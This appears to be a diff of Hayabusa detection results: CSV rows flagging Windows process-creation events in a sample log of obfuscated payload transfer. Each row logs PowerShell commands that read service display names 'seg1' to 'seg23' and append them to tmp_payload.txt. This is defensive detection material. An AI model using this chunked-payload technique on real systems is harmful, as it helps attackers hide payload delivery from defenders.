+2021-11-03 17:34:27.993 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg1"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xc10 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:34:29.447 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg2"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x9d0 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:34:29.447 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg2"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xab8 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:34:30.888 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg3"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x7c0 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:34:30.888 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg3"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xebc | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:34:32.339 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg4"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x874 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:34:32.339 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg4"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xc74 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:34:33.784 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg5"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xe0c | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:34:33.784 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg5"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xcfc | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:34:35.386 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg6"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x6e8 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:34:35.401 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg6"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xad8 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:34:36.836 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg7"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x92c | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:34:36.836 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg7"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x9ac | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:34:38.274 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg8"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x4a8 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:34:38.290 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg8"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xf2c | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:34:39.743 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg9"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x6fc | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:34:39.743 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg9"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x974 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:34:41.196 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg10"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x6b8 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:34:41.196 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg10"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x708 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:34:42.635 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg11"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xe88 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:34:42.651 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg11"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xe20 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:34:44.108 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg12"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xf78 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:34:44.108 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg12"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xaec | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:34:45.565 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg13"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xc14 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:34:45.565 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg13"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xde0 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:34:47.024 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg14"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x420 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:34:47.024 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg14"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x20c | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:34:48.467 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg15"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xf1c | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:34:48.482 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg15"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xcd0 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:34:49.925 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg16"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xe60 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:34:49.925 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg16"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x68c | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:34:51.386 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg17"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xf60 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:34:51.386 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg17"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xfb0 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:34:52.834 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg18"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xcfc | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:34:52.834 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg18"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xe0c | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:34:54.271 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg19"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x3f0 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:34:54.287 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg19"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xbac | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:34:55.740 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg20"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x9ac | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:34:55.740 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg20"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x92c | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:34:57.207 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg21"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x984 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:34:57.207 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg21"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x28c | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:34:58.654 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg22"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xf0c | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:34:58.654 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg22"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xaf0 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:35:00.089 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg23"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xf94 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:35:00.104 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg23"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x88 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
